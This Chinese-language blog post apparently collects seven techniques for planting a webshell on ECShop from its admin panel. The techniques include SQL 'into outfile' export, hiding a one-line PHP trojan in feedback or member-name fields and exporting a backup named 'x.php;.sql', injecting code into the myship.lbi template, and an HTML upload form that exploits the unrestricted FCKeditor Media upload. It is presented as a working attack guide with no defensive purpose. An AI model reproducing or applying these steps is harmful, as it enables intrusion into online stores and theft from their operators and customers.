ecshop后台拿shell的方法

ecshop后台拿shell总结 ecshop拿shell
一、系统==>数据库管理==>sql查询（可爆出物理路径）：
==============创建表失败，导不出shell======================

show databases; use 数据库名; create a(cmd text not null); insert into a(cmd) values(‘‘); select cmd from a into outfile ‘导出路径’; drop table if exists a;

==================创建表失败，导不出shell===================
二、前台留个言，内容是我们的一句话木马： 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份，选择ecs_feedback这张表（存放留言的表）
备份文件名：x.php;.sql （x.php.sql形式出错，菜刀链接不成功）
三、1、添加会员，会员名称插入插入一句话 ： ，其他随便填写。 2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” （其中XXX因各站而异，是数据前缀） 3、备份文件名为mm.php;.sql 4、一句话客户端连接mm.php;.sql，地址一般为 http://baiduhack.com/data/sqldata/mm.php;.sql
四、模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容之后面加入一句话代码： 菜刀链接http:// .baiduhack.com/myship.php 成功。
说明：有些服务器过滤了eval 导致失败。
五、/includes/fckeditor/editor/filemanager/connectors/php/upload.php /includes/fckeditor/editor/filemanager/connectors/php/connector.php /includes/fckeditor/editor/filemanager/connectors/test.html
http://url/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略 对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell 访问路径为
如果不登录后台访问的话是不能利用的，XXOO的。
EXP:

<form id="frmUpload" enctype="multipart/form-data" action="/includes/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

直接上传PHP马
文件地址是：
/images/upload/Media/xx.php
六、
上传txt 并且没有过滤任何函数. 于是运用到了php的文件操作… 将以上代码插入库项目管理中的myship.ini 打开http://url/myship.php 即在http://url/data/目录下生成distant.php;a.txt 菜刀连接之…搞定..
七、 进入后台-系统设置-Flash播放器管理- 直接上传x.php
ecshop V2.7.2 版本已经没有这个选项 ，所以这个已经失效。

疯狂暗示打赏按钮

本文标签：

声明：本文由代码号注册/游客用户【紫真】供稿发布，本站不对用户发布的ecshop后台拿shell的方法信息内容原创度和真实性等负责。如内容侵犯您的版权或其他权益，请留言并加以说明。站长审查之后若情况属实会及时为您删除。同时遵循 CC 4.0 BY-SA 版权协议，尊重和保护作者的劳动成果，转载请标明出处链接和本声明内容。本文作者：紫真» https://www.ebingou.cn/dmh/13688.html

很赞哦！ ()